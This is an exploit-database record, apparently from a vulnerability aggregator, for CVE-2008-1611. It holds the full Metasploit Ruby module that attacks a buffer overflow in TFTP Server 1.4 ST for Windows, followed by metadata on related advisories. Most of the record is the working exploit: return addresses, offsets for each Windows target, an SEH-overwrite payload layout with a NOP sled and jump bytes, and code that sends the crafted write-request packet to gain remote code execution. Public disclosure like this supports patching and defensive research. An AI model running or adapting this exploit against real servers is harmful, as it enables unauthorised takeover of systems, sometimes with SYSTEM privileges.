TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow

{"bulletinFamily": "exploit", "id": "EDB-ID:18759", "cvelist": ["CVE-2008-1611"], "modified": "2012-04-20T00:00:00", "lastseen": "2016-02-02T10:23:57", "edition": 1, "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tRank = NormalRanking\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\r\n\t\t\t\tis due to the way TFTP handles the filename parameter extracted from a WRQ request.\r\n\t\t\t\tThe server will append the user-supplied filename to TFTP server binary's path\r\n\t\t\t\twithout any bounds checking, and then attempt to open this with a fopen(). Since\r\n\t\t\t\tthis isn't a valid file path, fopen() returns null, which allows the corrupted\r\n\t\t\t\tdata to be used in a strcmp() function, causing an access violation.\r\n\r\n\t\t\t\tSince the offset is sensitive to how the TFTP server is launched, you must know\r\n\t\t\t\tin advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\r\n\t\t\t\t, and then manually select your target accordingly. A successful attempt will lead\r\n\t\t\t\tto remote code execution under the context of SYSTEM if run as a service, or\r\n\t\t\t\tthe user if run as a standalone. A failed attempt will result a denial-of-service.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Mati Aharoni', #Initial discovery, PoC\r\n\t\t\t\t\t'Datacut' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1611' ],\r\n\t\t\t\t\t[ 'OSVDB', '43785' ],\r\n\t\t\t\t\t[ 'BID', '18345' ],\r\n\t\t\t\t\t[ 'EDB', '5314' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' =>'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.\r\n\t\t\t\t\t# possible may work for other service packs and or vista\r\n\t\t\t\t\t# Rets = P/P/R from tftpserversp.exe\r\n\t\t\t\t\t[ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ],\r\n\t\t\t\t\t[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ],\r\n\t\t\t\t\t[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> false,\r\n\t\t\t'DisclosureDate'=> 'Mar 26 2008',\r\n\t\t\t'DefaultTarget' => 4)) #TFTP is installed as a service\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(69)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tnops = make_nops(50)\r\n\t\tlead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)\r\n\t\tnear = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled\r\n\t\tnseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump\r\n\r\n\t\tevil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')\r\n\t\tmode = \"netascii\"\r\n\r\n\t\t#Send the WRQ packet (header \"\\x00\\x02\")\r\n\t\tsploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\"\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "published": "2012-04-20T00:00:00", "href": "https://www.exploit-db.com/exploits/18759/", "osvdbidlist": ["43785"], "reporter": "metasploit", "hash": "71d3fc7dcbd60718d91a77c1db983857ae39673c57ff6782a93bbe2d314dca73", "title": "TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow. CVE-2008-1611. Remote exploit for windows platform", "references": [], "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18759/", "enchantments": {"vulnersScore": 4.8}}

{"result": {"cve": [{"id": "CVE-2008-1611", "type": "cve", "title": "CVE-2008-1611", "description": "Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request.", "published": "2008-04-01T12:44:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1611", "cvelist": ["CVE-2008-1611"], "lastseen": "2017-08-08T11:24:35"}], "seebug": [{"id": "SSV-72800", "type": "seebug", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "description": "Summary: \nTFTP Server for PXEBOOT of the free multi-threaded TFTP server.< br/>the TFTP Server does not properly handle user-submitted super long file name, if the user is presented with a long file name in the authentication request, then it could trigger a stack overflow, causing a denial of service or execute arbitrary instructions.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-72800", "cvelist": ["CVE-2008-1611"], "lastseen": "2016-07-28T05:04:51"}, {"id": "SSV-72479", "type": "seebug", "title": "TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit", "description": "Summary: \nTFTP Server for PXEBOOT of the free multi-threaded TFTP server.< br/>the TFTP Server does not properly handle user-submitted super long file name, if the user is presented with a long file name in the authentication request, then it could trigger a stack overflow, causing a denial of service or execute arbitrary instructions.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-72479", "cvelist": ["CVE-2008-1611"], "lastseen": "2016-07-27T00:44:36"}, {"id": "SSV-65281", "type": "seebug", "title": "TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)", "description": "Summary: \nTFTP Server for PXEBOOT of the free multi-threaded TFTP server.< br/>the TFTP Server does not properly handle user-submitted super long file name, if the user is presented with a long file name in the authentication request, then it could trigger a stack overflow, causing a denial of service or execute arbitrary instructions.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-65281", "cvelist": ["CVE-2008-1611"], "lastseen": "2016-07-26T11:44:53"}], "exploitdb": [{"id": "EDB-ID:18345", "type": "exploitdb", "title": "TFTP Server 1.4 - ST RRQ Buffer Overflow Exploit", "description": "TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit. CVE-2008-1611. Remote exploit for windows platform", "published": "2012-01-10T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18345/", "cvelist": ["CVE-2008-1611"], "lastseen": "2016-02-02T09:34:14"}, {"id": "EDB-ID:5314", "type": "exploitdb", "title": "TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit 0day", "description": "TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day). CVE-2008-1611. Remote exploit for windows platform", "published": "2008-03-26T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/5314/", "cvelist": ["CVE-2008-1611"], "lastseen": "2016-01-31T22:57:00"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/TFTP/TFTPSERVER_WRQ_BOF", "type": "metasploit", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw is due to the way TFTP handles the filename parameter extracted from a WRQ request. The server will append the user-supplied filename to TFTP server binary's path without any bounds checking, and then attempt to check this path with a fopen(). Since this isn't a valid file path, fopen() returns null, which allows the corrupted data to be used in a strcmp() function, causing an access violation. Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' , and then manually select your target accordingly. A successful attempt will lead to remote code execution under the context of SYSTEM if run as a service, or the user if run as a standalone. A failed attempt will result a denial-of-service.", "published": "2012-04-20T01:23:19", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2008-1611"], "lastseen": "2017-08-21T15:31:28"}], "packetstorm": [{"id": "PACKETSTORM:112007", "type": "packetstorm", "title": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", "description": "", "published": "2012-04-20T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/112007/TFTP-Server-for-Windows-1.4-ST-WRQ-Buffer-Overflow.html", "cvelist": ["CVE-2008-1611"], "lastseen": "2016-12-05T22:11:57"}]}}